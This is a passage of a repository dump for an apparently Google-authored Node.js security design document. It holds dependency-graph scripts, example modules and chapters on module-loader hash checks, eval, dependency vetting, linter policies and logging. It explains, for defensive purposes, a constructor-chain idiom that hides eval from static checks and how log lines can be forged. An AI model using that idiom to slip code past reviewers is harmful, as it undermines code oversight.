./node_modules/.bin/mocha 2>&1 \ 31 | | perl -ne 's/"$ENV{PWD}/"./g; if (s/^REQUIRE_LOG_DOT://) { print $_; } else { print STDERR $_; }' 32 | 33 | # Add an edge from package.json to the main module. 
34 | echo ' "./package.json" -> "./index.js";' 35 | echo ' "./package.json" [fillcolor=black,fontcolor=white,style=filled];' 36 | echo '}' 37 | ) > graphs/full.dot 38 | 39 | python -c ' 40 | import re 41 | import sys 42 | 43 | EDGE_RE = re.compile(r"""^ *(\"(?:[^\"\\]|\\.)*\") -> (\"(?:[^\"\\]|\\.)*\");$""") 44 | GRAPH_END_RE = re.compile(r"^ *\}") 45 | 46 | edges = {} 47 | def add_edge(src, tgt): 48 | tgts = edges.get(src) 49 | if tgts is None: 50 | tgts = [] 51 | edges[src] = tgts 52 | tgts.append(tgt) 53 | 54 | for line in sys.stdin: 55 | edges_match = EDGE_RE.match(line) 56 | if edges_match is not None: 57 | add_edge(edges_match.group(1), edges_match.group(2)) 58 | continue 59 | elif GRAPH_END_RE.match(line): 60 | reachable = set() 61 | def find_reachable(src): 62 | if src not in reachable: 63 | reachable.add(src) 64 | for tgt in edges.get(src, ()): 65 | find_reachable(tgt) 66 | find_reachable("\"./package.json\"") 67 | reachable = list(reachable) 68 | reachable.sort() 69 | for src in reachable: 70 | for tgt in edges.get(src, ()): 71 | print " %s -> %s;" % (src, tgt) 72 | print line, 73 | ' < graphs/full.dot > graphs/filtered.dot 74 | 75 | for graph in full filtered; do 76 | dot -Tsvg graphs/"$graph".dot > graphs/"$graph".svg 77 | done 78 | 79 | # Start walking from package.json 80 | 81 | -------------------------------------------------------------------------------- /chapter-2/example/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "dynamism-example", 3 | "private": true, 4 | "description": "Example code that shows dynamically walking the test graph", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo $NODE; ./node_modules/.bin/mocha" 8 | }, 9 | "author": "Mike Samuel", 10 | "license": "Apache-2.0", 11 | "devDependencies": { 12 | "chai": ">=4.1.2", 13 | "mocha": ">=4.0.1" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- 
/chapter-2/example/test/test.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | // test/test.js 19 | 20 | var expect = require("chai").expect; 21 | var app = require("../index"); 22 | 23 | describe("My TestSuite", () => { 24 | describe("A test", () => { 25 | it("A unittest", () => { 26 | // Exercise the API 27 | app.lazyLoad(); 28 | }); 29 | }); 30 | }); 31 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/.gitignore: -------------------------------------------------------------------------------- 1 | dist 2 | node_modules -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/goodbye.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 
7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | exports.say = x => console.log(`Goodbye, ${x}!`); 19 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/hello.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | exports.say = x => console.log(`Hello, ${x}!`); 19 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/index.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 
7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | var metadata = require('./package.json'); 19 | var greeting = require('./' + metadata.greeting); 20 | 21 | greeting.say('World'); 22 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "webpack-compat-experiment", 3 | "description": "Figuring out how well webpack deals with dynamic loads", 4 | "version": "0.0.0", 5 | "main": "index.js", 6 | "dependencies": {}, 7 | "scripts": {}, 8 | "author": "Mike Samuel", 9 | "license": "Apache-2.0", 10 | "greeting": "hello", 11 | "devDependencies": { 12 | "webpack": "^3.10.0" 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/test-utils.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | exports.doSomethingScaryButItsOkInTest = function() { 19 | throw new Error('test-utils.js: NOT PRODUCTION CODE'); 20 | }; 21 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/test.sh: -------------------------------------------------------------------------------- 1 | echo <&1 | grep -q 'Hello, World!'; then 43 | echo 'Ran ok' 44 | else 45 | echo 'Failed to bundle dependency' 46 | fi 47 | 48 | echo 49 | echo Looking for non production code 50 | if grep -Hn 'NOT PRODUCTION CODE' dist/bundle.js; then 51 | echo 'Webpack bundled test code in its minimal configuration' 52 | false 53 | fi 54 | 55 | # */ 56 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/test/test.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 
16 | */ 17 | 18 | console.log('test/test.js: NOT PRODUCTION CODE'); 19 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/webpack.config.js: -------------------------------------------------------------------------------- 1 | const path = require('path'); 2 | 3 | module.exports = { 4 | output: { 5 | path: path.resolve('./dist'), 6 | filename: 'bundle.js', 7 | }, 8 | entry: path.resolve('./index.js') 9 | }; 10 | -------------------------------------------------------------------------------- /chapter-2/source-contents.md: -------------------------------------------------------------------------------- 1 | # Source Content Checks 2 | 3 | The node runtime's module loader uses the `_compile` method to actually 4 | turn file content into code thus: 5 | 6 | ```js 7 | // Run the file contents in the correct scope or sandbox. Expose 8 | // the correct helper variables (require, module, exports) to 9 | // the file. 10 | // Returns exception, if any. 11 | Module.prototype._compile = function(content, filename) { 12 | content = internalModule.stripShebang(content); 13 | 14 | // create wrapper function 15 | var wrapper = Module.wrap(content); 16 | 17 | var compiledWrapper = vm.runInThisContext(wrapper, { 18 | ``` 19 | 20 | At the top of that method body, we can check that the content 21 | is on a list of production sources. 22 | 23 | The entire process looks like: 24 | 25 | 1. Developer develops and tests their app iteratively as normal. 26 | 2. The developer generates a list of production sources via the 27 | dynamic bundling scheme outlined earlier, a static tool like 28 | webpack, or some combination. 29 | 3. The bundling tool generates a file with a cryptographic hash 30 | for each production source. 31 | We prefer hashing to checking paths for reasons that will become 32 | apparent later when we discuss `eval`. 33 | 4. A deploy script copies the bundle and the hashes to a production server. 34 | 5. 
The server startup script passes a flag to `node` or `npm start` 35 | telling the runtime where to look for the production source hashes. 36 | 6. The runtime reads the hashes and combines them with any hashes necessary 37 | to whitelist any `node` internal JavaScript files that might load 38 | via `require`. 39 | 7. When a call to `require(x)` reaches `Module.prototype._compile` 40 | it hashes `content` and checks that the hash is in the allowed set. 41 | If not, it logs that and, if not in report-only-mode, 42 | raises an exception. 43 | 8. Normal log collecting and monitoring communicates failures 44 | to the development team. 45 | 46 | This is similar to [Content-Security-Policy (CSP)][csp] but for 47 | server-side code. Like CSP, there is an intermediate step that might 48 | be useful between no enforcement and full enforcement: 49 | [report only mode][]. 50 | 51 | [CSP]: https://developers.google.com/web/fundamentals/security/csp/ 52 | [report only mode]: https://developers.google.com/web/fundamentals/security/csp/#report-only 53 | -------------------------------------------------------------------------------- /chapter-2/synthetic-modules.md: -------------------------------------------------------------------------------- 1 | # Statically eliminating `eval` 2 | 3 | Pug provides a flexible API to load Pug templates from `.pug` files 4 | that `eval`s the generated code ([code][pug-eval]), 5 | and a command line interface for precompiling Pug files. 6 | 7 | Let's ignore those and imagine ways to allow a Pug user to 8 | compile a Pug template that makes the static nature apparent 9 | even to an analysis which doesn't make assumptions about the 10 | contents of `.pug` files. 11 | 12 | ```js 13 | const pug = require('pug'); 14 | 15 | exports.myTemplate = pug.lang` 16 | doctype html 17 | html 18 | head 19 | ...`; 20 | ``` 21 | 22 | This code snippet uses a [tagged template literal][] to allow Pug 23 | template code to appear inline in a JavaScript file.
24 | 25 | Rather than loading a `.pug` file, we have declared it in JavaScript. 26 | 27 | Imagine further that `pug.lang` runs the compiler, but instead of 28 | using `new Function(...)` it uses some new module API 29 | 30 | ```js 31 | require.synthesize(generatedCode) 32 | ``` 33 | 34 | which could manufacture a `Module` instance with the generated code and 35 | install the module into the cache with the input hash as its filename. 36 | 37 | When [bundling](bundling.md), we could dump the content of synthesized 38 | modules, and, when the bundle loads in production, pre-populate 39 | the module cache. When the `pug.lang` implementation asks the 40 | module loader to create a module with the content between 41 | `...` it would find a resolved module ready but not 42 | loaded. If a module is already in the cache, `Module` skips the 43 | additional content checks. 44 | 45 | The Node runtime function, `makeRequireFunction` 46 | ([code][makeRequireFunction]), defines a `require` for each module 47 | that loads modules with the current module as the parent. That would 48 | also have to define a module specific `require.synthesize` that does 49 | something like: 50 | 51 | ```js 52 | function synthesize(content) { 53 | content = String(content); 54 | // Hashing gives us a stable identifier so that we can associate 55 | // code inlined during bundling with that loaded in production. 56 | const hash = crypto 57 | .createHash('sha512') 58 | .update(content, 'utf8') 59 | .digest(); 60 | // A name that communicates the source while being 61 | // unambiguous with any actual file. 62 | const filename = '/dev/null/synthetic/' + hash; 63 | // We scope the identifier so that it is clear in 64 | // debugging trace that the module is synthetic and 65 | // to avoid leading existing tools to conclude that 66 | // it is available via registry.npmjs.org. 
67 | const id = '@node-internal-synthetic/' + hash; 68 | const cache = Module._cache; 69 | let syntheticModule = cache[filename]; 70 | if (syntheticModule) { 71 | // TODO: updateChildren(mod, syntheticModule, true); 72 | } else { 73 | cache[filename] = syntheticModule = new Module(id, mod); 74 | syntheticModule.loaded = true; 75 | syntheticModule._compile(content, filename); 76 | } 77 | // TODO: dump the module if the command line flags specify 78 | // a synthetic_node_modules/ output directory. 79 | return syntheticModule; 80 | } 81 | 82 | require.synthesize = synthesize; 83 | ``` 84 | 85 | Static analysis tools often benefit from having a whole program 86 | available. Humans can reason about external files, like `.pug` files, 87 | but static analysis tools often have to be unsound, or assume the 88 | worst. Synthetic modules may provide a way to move a large chunk of 89 | previously unanalyzable code into the domain of what static analysis 90 | tools can check. 91 | 92 | This scheme might be more discoverable if code generator authors 93 | adopted some conventions: 94 | 95 | * If a module defines `exports.lang` it should be usable as a 96 | template tag. 97 | * If that same function is called with an option map instead 98 | of as a template tag function, then it should return a function 99 | to enable usages like 100 | ```js 101 | pug.lang(myPugOptionMap)` 102 | doctype html 103 | ...` 104 | ``` 105 | * If the first line starts with some whitespace, all subsequent 106 | lines have that same whitespace as a prefix, and the language 107 | is whitespace-sensitive, then strip it before processing. 108 | This would allow indenting inline DSLs within a larger 109 | JavaScript program. 110 | 111 | We discuss template tag usability concerns in more detail later when 112 | discussing [library tweaks][library]. 113 | 114 | This proposal has one major drawback: we still have to trust the code 115 | generator.
Pug's code generator looks well structured, but reasoning 116 | about all the code produced by a code generator is harder than 117 | reasoning about one hand-written module. The [frozen realms][] proposal 118 | restricts code to a provided API, as 119 | `vm.runInNewContext` aimed to. If Pug, for example, chose to load its 120 | code in a sandbox, then checking just the provided context would give 121 | us confidence about what generated code could do. In some cases, we 122 | might be able to move the code generator outside the 123 | [*trusted computing base*][TCB]. 124 | 125 | [tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals 126 | [pug-eval]: https://github.com/pugjs/pug/blob/926f7c720112cac76cfedb003e25e9f43d3a1767/packages/pug/lib/index.js#L261-L263 127 | [library]: ../chapter-7/libraries.md 128 | [makeRequireFunction]: https://github.com/nodejs/node/blob/8f5040771475ca5435b6cb78ab2ebce7447afcc1/lib/internal/module.js#L5 129 | [frozen realms]: https://github.com/tc39/proposal-frozen-realms 130 | [TCB]: https://en.wikipedia.org/wiki/Trusted_computing_base 131 | -------------------------------------------------------------------------------- /chapter-2/what-about-eval.md: -------------------------------------------------------------------------------- 1 | # What about `eval`? 2 | 3 | Previously we've talked about how to control what code loads 4 | from the file system, but not what code loads from strings. 5 | 6 | The rest of this discussion uses the term "`eval`" to refer to any of 7 | the `eval` operator, the `eval` function, `new Function`, 8 | `vm.runIn*Context`, `vm.Script.run*`, [`WebAssembly.compile`][] 9 | and other operators that convert strings or bytes into code.
10 | 11 | Recall that it is difficult to prove that code 12 | [does not `eval`](../chapter-1/threat-RCE.md): 13 | 14 | ```js 15 | var x = {}, 16 | a = 'constructor', 17 | b = 'constructor', 18 | s = 'console.log(s)'; 19 | x[a][b](s)(); 20 | ``` 21 | 22 | Some node projects deploy with a tweaked node runtime that turns off 23 | some `eval` operators, but there are widely used npm modules that use 24 | them carefully. For example: 25 | 26 | * [Pug][] generates HTML from templates. 27 | * [Mathjs][] evaluates closed-form mathematical expressions. 28 | 29 | Both generate JavaScript code under the hood, which is dynamically 30 | parsed. Let's consider two use cases: 31 | 32 | * Pug's code generator is usually called with trusted inputs, e.g. 33 | `.pug` files authored by trusted developers. 34 | * Mathjs is often called with untrusted inputs. If a developer 35 | wanted to let a user generate an ad-hoc report without having to 36 | download data into a spreadsheet, they might use Mathjs to parse 37 | user-supplied arithmetic expressions ([docs][more_secure_eval]) 38 | instead of trying to check that an input is safe to `eval` via 39 | `RegExp`s. It is not without risk ([advisory][adv552]) 40 | though [^1]. 41 | 42 | These two uses of code generators fall at either end of a spectrum. 43 | The uses of Pug seem static, all the information is available before 44 | we deploy. Our Mathjs use case is necessarily dynamic since the 45 | input is not available until a user is in the loop. 46 | 47 | Next we discuss ways to recognize and simplify the former, while 48 | double-checking the latter. On the client, we have no options between 49 | allowing implicit `eval` and banning all uses of `eval`. There are 50 | fewer compelling use cases on the client since it is harder to 51 | amortize code generation over multiple requests. On the server, use 52 | of `eval` in the presence of untrusted inputs still needs to be 53 | carefully vetted. 
We explore ways to programmatically enforce vetting 54 | decisions short of a blanket ban, but turning off `eval` before 55 | accepting untrusted inputs is still the most reliable way to prevent 56 | attackers from using `eval` against you. 57 | 58 | [^1]: Since this writing, [Mathjs got rid of all uses of `eval`][no-eval-issue] 59 | 60 | 61 | [`WebAssembly.compile`]: http://webassembly.org/docs/js/#webassemblycompile 62 | [Pug]: https://pugjs.org/ 63 | [Mathjs]: http://mathjs.org/ 64 | [more_secure_eval]: http://mathjs.org/examples/advanced/more_secure_eval.js.html 65 | [adv552]: https://nodesecurity.io/advisories/552 66 | [no-eval-issue]: https://github.com/josdejong/mathjs/issues/1019#issuecomment-367289278 67 | -------------------------------------------------------------------------------- /chapter-3/knowing_dependencies.md: -------------------------------------------------------------------------------- 1 | # Knowing your dependencies 2 | 3 | ## Background 4 | 5 | [`npmjs` search results][npmjs/node] have stats on download count and 6 | open issues and PRs. 7 | 8 | npmjs.com stats for module node 9 | 10 | Each package page also links to the corresponding GitHub project 11 | which has links to the project's [pulse][github-pulse]. 12 | 13 | Both of these give an idea of how popular the project is, and 14 | whether it's actively developed. 15 | 16 | On their Github pages, many projects proudly display 17 | [badges and shields][] indicating their continuous integration status, 18 | and other vital statistics. 19 | 20 | The Linux Core Infrastructure project espouses a set of 21 | [best practices badges][bpb] and defines tiers for mature infrastructure 22 | projects.
We get some of the basic items for free by distributing via 23 | `npm`, but other items bear on how responsive the project might be to 24 | vulnerability reports and how it might respond to attempts to inject 25 | malicious code: 26 | 27 | * Another will have the necessary access rights if someone dies 28 | * Monitor external dependencies to detect/fix known vulnerabilities 29 | * At least 2 unassociated significant contributors 30 | * Use 2FA 31 | * At least 50% of all modifications are reviewed by another 32 | * Have a security review (internal or external) 33 | 34 | "Use 2FA" is possible with npm but it is not clear that it is widely 35 | practiced. [MTP][] discusses the support already built into Github 36 | and `npm profile`. 37 | 38 | 39 | ## Problem 40 | 41 | Threats: [LQC][] [MTP][] 42 | 43 | The npm repository, like other open-source code repositories, 44 | contains mature and well-maintained modules, but also plenty of 45 | bleeding-edge code that has not yet had bugs ironed out. 46 | 47 | A wise technical lead might decide that they can use third-party 48 | dependencies that have been widely used in production for several 49 | years by projects with similar needs since gross errors are likely 50 | to have been fixed. 51 | 52 | That technical lead might also decide that they can use bleeding edge 53 | code when they have enough local expertise to vet it, identify 54 | corner-cases they need to check, and fix any gross errors they 55 | encounter. 56 | 57 | Either way, that decision to use bleeding-edge code or code that might 58 | not be maintained over the long term should be a conscious one. 59 | 60 | 61 | ## Success Criteria 62 | 63 | Development teams are rarely surprised when code that they had built a 64 | prototype on later turns out not to be ready for production use, and 65 | they do not have to pore over others' code to vet many dependencies. 66 | 67 | ## A Possible Solution 68 | 69 | The building blocks of a solution probably already exist. 
70 | 71 | ### Aggregate more signals 72 | 73 | `npmjs.com` may or may not be the right place to do this, but we 74 | should, as a community, aggregate signals about modules and make 75 | them readily available. 76 | 77 | `npmjs.com/package` already aggregates some useful signals, but 78 | it or another forum could aggregate more including 79 | 80 | - More of the GitHub pulse information including 81 | closed issues, PRs over time. 82 | - Relevant badges & shields for the project itself. 83 | - Relevant badges & shields by percentage of transitive 84 | dependencies and peer dependencies that have them. 85 | - Support channels, e.g. slack & discord. 86 | - Vulnerability reports and the version they affect. 87 | See sources in ["When all else fails"][failing] 88 | - Weighted mean of age of production dependencies transitively. 89 | - Results of linters (see [oversight][]) run without respecting 90 | [inline ignore comments][eslint-ignore-line] and 91 | [file ignore directives][eslint-ignore-file]. 92 | 93 | Users deciding whether to buy something from an online store or 94 | download a cellphone app from an app store have reviews 95 | and comments from other users. That members of the community take 96 | time to weigh in can be a useful signal, and the details can help 97 | clarify whether this module or an alternative might be better for a 98 | specific use. 99 | 100 | Large organizations who host [internal replicas][] may already have a 101 | lot of the opinion available internally, but aggregating that across 102 | clients can help smaller organizations and large organizations 103 | that are debating whether to dip their toe in. 104 | 105 | 106 | ### Leadership & Developer outreach 107 | 108 | The node runtime already [passes][CI-node] the Linux Foundation's best 109 | practices criteria, but could lead the way by explaining how a project 110 | that pushes from GitHub to `registry.npmjs.org` can pass more of these 111 | criteria. 
112 | 113 | 114 | [npmjs/node]: https://www.npmjs.com/package/node 115 | [github-pulse]: https://github.com/blog/1476-get-up-to-speed-with-pulse 116 | [badges and shields]: https://github.com/badges/shields 117 | [bpb]: https://github.com/coreinfrastructure/best-practices-badge 118 | [internal replicas]: ../chapter-4/close_dependencies.md 119 | [failing]: ../chapter-6/failing.md 120 | [CRY]: ../chapter-1/threat-CRY.md 121 | [LQC]: ../chapter-1/threat-LQC.md 122 | [MTP]: ../chapter-1/threat-MTP.md 123 | [oversight]: ../chapter-5/oversight.md 124 | [eslint-ignore-line]: https://eslint.org/docs/user-guide/configuring#disabling-rules-with-inline-comments 125 | [eslint-ignore-file]: https://eslint.org/docs/user-guide/configuring#ignoring-files-and-directories 126 | [CI-node]: https://bestpractices.coreinfrastructure.org/projects?gteq=50&q=Node.js 127 | -------------------------------------------------------------------------------- /chapter-5/oversight.md: -------------------------------------------------------------------------------- 1 | # Oversight 2 | 3 | 4 | ## Problem 5 | 6 | Threats: [BOF][] [CRY][] [DEX][] [EXF][] [LQC][] [QUI][] [RCE][] [SHP][] 7 | 8 | Manually reviewing third party modules for known security problems 9 | is time consuming. 10 | 11 | Having developers wait for such review unnecessarily slows down 12 | development. 13 | 14 | Our engineering processes ought not force us to choose between 15 | forgoing sanity checks and shipping code in a timely manner. 16 | 17 | 18 | ## Background 19 | 20 | [JSConformance][] allows a project team to specify a policy for 21 | Closure JavaScript. This policy can encode lessons learned about APIs 22 | that are prone to misuse. By taking into account type information 23 | about arguments and `this`-values it can distinguish problematic 24 | patterns like `setTimeout(aString, dt)` from unproblematic ones 25 | `setTimeout(aFunction, dt)`. 
26 | 27 | [TSLint][tslint] and [ESLint][eslint] both allow custom rules so can 28 | be extended as a project or developer community identifies Good and 29 | Bad parts of JavaScript for their particular context. 30 | 31 | 32 | 33 | ## A possible solution 34 | 35 | ### Encode lessons learned by the community in linter policies 36 | 37 | Instead of having security specialists reviewing lots of code 38 | they should focus on improving tools. 39 | Some APIs and idioms are more prone to misuse than others, and some 40 | should be deprecated in favor of more robust ways of expressing the 41 | same idea. As the community reaches a rough consensus that a code 42 | pattern is prone to misuse or there is a more robust alternative, we 43 | could try to encode that knowledge in an automatable policy. 44 | 45 | Linters are not perfect. There are no sound production-quality static 46 | type systems for JavaScript, so its linters are also necessarily 47 | heuristic. TSLint typically has more fine-grained type information 48 | available than ESLint, so there are probably more anti-patterns that 49 | TSLint can identify with an acceptable false-positive rate than 50 | ESLint, but feedback about what can and can't be expressed in ESLint 51 | might give its maintainers useful feedback. 52 | 53 | Linters can reduce the burden on reviewers by enabling computer aided 54 | code review — helping reviewers focus on areas that use powerful 55 | APIs, and giving a sense of the kinds of problems to look out for. 56 | 57 | They can also give developers a sense of how controversial a review 58 | might be, and guide them in asking the right kinds of questions. 59 | 60 | Custom policies can also help educate developers about alternatives. 
61 | 62 | The rule below specifies an anti-pattern for client-side JavaScript 63 | in machine-checkable form, assigns it a name, has a short summary that 64 | can appear in an error message, and a longer description or 65 | documentation URL that explains the reasoning behind the rule. 66 | 67 | It also documents a number of known exceptions to the rule, for 68 | example, APIs that wrap `document.write` to do additional checks. 69 | 70 | ```pb 71 | requirement: { 72 | rule_id: 'closure:documentWrite' 73 | type: BANNED_PROPERTY 74 | error_message: 'Using Document.prototype.write is not allowed. ' 75 | 'Use goog.dom.safe.documentWrite instead.' 76 | '' 77 | 'Any content passed to write() will be automatically ' 78 | 'evaluated in the DOM and therefore the assignment of ' 79 | 'user-controlled, insufficiently sanitized or escaped ' 80 | 'content can result in XSS vulnerabilities.' 81 | '' 82 | 'Document.prototype.write is bad for performance as it ' 83 | 'forces document reparsing, has unpredictable semantics ' 84 | 'and disallows many optimizations a browser may make. ' 85 | 'It is almost never needed.' 86 | '' 87 | 'Exceptions allowed for:' 88 | '* writing to a completely new window such as a popup ' 89 | ' or an iframe.' 90 | '* frame busting.' 91 | '' 92 | 'If you need to use it, use the type-safe ' 93 | 'goog.dom.safe.documentWrite wrapper, or directly ' 94 | 'render a Strict Soy template using ' 95 | 'goog.soy.Renderer.prototype.renderElement (or similar).' 96 | 97 | value: 'Document.prototype.write' 98 | value: 'Document.prototype.writeln' 99 | 100 | # These uses have been determined to be safe by manual review. 
101 | whitelist: 'javascript/closure/async/nexttick.js' 102 | whitelist: 'javascript/closure/base.js' 103 | whitelist: 'javascript/closure/dom/safe.js' 104 | } 105 | ``` 106 | 107 | ---- 108 | 109 | We propose a project that maintains a set of linter policies per language: 110 | 111 | * A **common** policy suitable for all projects that identifies 112 | anti-patterns that are generally regarded as bad practice by the 113 | community with a low false positive rate. 114 | * A **strict** policy suitable for projects that are willing to 115 | deal with some false positives in exchange for identifying more 116 | potential problems. 117 | * An **experimental** policy that projects that want to contribute to 118 | linter policy development can use. 119 | New rules go here first, so that rule maintainers can get feedback 120 | about their impact on real code. 121 | 122 | 123 | ### Decouple Reviews from Development 124 | 125 | Within a large organization, there are often multiple review cycles, some 126 | concurrent: 127 | 128 | - Reviews of designs and use cases where developers gather information 129 | from others. 130 | - Code reviewers critique pull requests for correctness, maintainability, 131 | testability. 132 | - Release candidate reviews where professional testers examine a 133 | partial system and try to break it. 134 | - Pre-launch reviews where legal, security & privacy, and other 135 | concerned parties come to understand the state of the system and 136 | weigh in on what they need to be able to support its deployment. 137 | - Limited releases where trusted users get to use an application. 138 | 139 | Reviews should happen early and late. When designing a system or a 140 | new feature, technical leads should engage specialists. Before 141 | shipping, they should circle back to double check the implementation. 
142 | During rapid development though, developers should drive development 143 | — they may ask questions, and may receive feedback (solicited 144 | and not), but ought not have to halt work while they wait for reviews 145 | from specialists. 146 | 147 | Some changes have a higher security impact than others, so 148 | some will require review by security specialists, but not most. 149 | 150 | During an ongoing security review, security specialists can contribute 151 | use cases and test cases; file issues; and help to integrate tools 152 | like linters, fuzzers, and vulnerability scanners. 153 | 154 | As described in "[Keeping your dependencies close][]", new third-party 155 | modules are of particular interest to security specialists, but 156 | shouldn't require security review before developers use them on an 157 | experimental basis. 158 | 159 | There are many workflows that allow people to work independently 160 | and later circle back so that nothing falls through the cracks. 161 | Below is one that has worked in similar contexts: 162 | 163 | 1. The developer (or the automated import script) files a 164 | tracking issue that is a prerequisite for pre-launch review. 165 | 2. If the developer later finds out that they don't plan on using 166 | the unreviewed module, they can close the tracking issue. 167 | 3. The assigned security specialist asks follow-up questions and 168 | reports their findings via the tracking issue. 169 | 4. A common pre-launch script queries a module metadata 170 | database maintained by security to identify still-unvetted 171 | dependencies.
172 | 173 | [BOF]: ../chapter-1/threat-BOF.md 174 | [CRY]: ../chapter-1/threat-CRY.md 175 | [DEX]: ../chapter-1/threat-DEX.md 176 | [EXF]: ../chapter-1/threat-EXF.md 177 | [LQC]: ../chapter-1/threat-LQC.md 178 | [RCE]: ../chapter-1/threat-RCE.md 179 | [SHP]: ../chapter-1/threat-SHP.md 180 | [QUI]: ../chapter-1/threat-QUI.md 181 | [JSConformance]: https://github.com/google/closure-compiler/wiki/JS-Conformance-Framework 182 | [tslint]: https://palantir.github.io/tslint/develop/custom-rules/ 183 | [eslint]: https://eslint.org/docs/developer-guide/working-with-rules-new#runtime-rules 184 | [Keeping your dependencies close]: ../chapter-4/close_dependencies.md 185 | -------------------------------------------------------------------------------- /chapter-6/failing.md: -------------------------------------------------------------------------------- 1 | # When all else fails 2 | 3 | ## Background 4 | 5 | The ["Incident Handlers Handbook"][SANS] discusses at length how to 6 | respond to security breaches, but the main takeaways are: 7 | 8 | * You need to do work before incidents happen to be able to 9 | respond effectively. 10 | * Similar measures can lower the rate of incidents. 11 | * You will still have incidents. 12 | * Being in a position to respond effectively can limit damage when 13 | incidents occur. 14 | 15 | Node's proposed [security working group][security-wg] 16 | includes in its charter measures to route information about 17 | vulnerabilities and fixes to the right places, and coordinate response 18 | and disclosure. 19 | 20 | Package monitoring services like [nodesecurity], GitHub's 21 | [package graph][github graph], [snyk][], and the 22 | [nodejs-sec list][nodejs-sec] aim to help vulnerability reports get to 23 | those who need them. 24 | 25 | 26 | ## Problem 27 | 28 | Threats: [0DY][] 29 | 30 | Node's security working group is working on a lot of preparedness 31 | issues so we only address a few. 
32 | 33 | ### Naming is hard 34 | 35 | Each of the groups mentioned above is doing great work trying to help 36 | patches get to those who need them. Each seems to be rolling their own 37 | naming scheme for vulnerabilities. 38 | 39 | The computer security community has a 40 | [centralized naming scheme][CVE-IDs] for vulnerability reports so that 41 | reports don't fall through the cracks. Security responders rarely 42 | have the luxury of dealing with a single stack much less a single 43 | layer of that stack so mailing lists are not sufficient — if 44 | reporters roll their own naming scheme or only disclose via 45 | unstructured text, reports will fall through the cracks. 46 | 47 | ### Logging 48 | 49 | When trying to diagnose a problem, responders often look to log files. 50 | There has been much written on how to protect logs from 51 | [forgery][log injection]. 52 | 53 | ```js 54 | console.log(s); 55 | ``` 56 | 57 | on a stock node runtime allows an attacker who controls `s` to write 58 | any content to a log. 59 | 60 | ```js 61 | console.log('MyModule: ' + s); 62 | ``` 63 | 64 | is a bit better. An attacker has to insert a newline character into 65 | `s` to forge another module's log prefix, and can't get rid of the 66 | previous one. 67 | 68 | 69 | ## Success Criteria 70 | 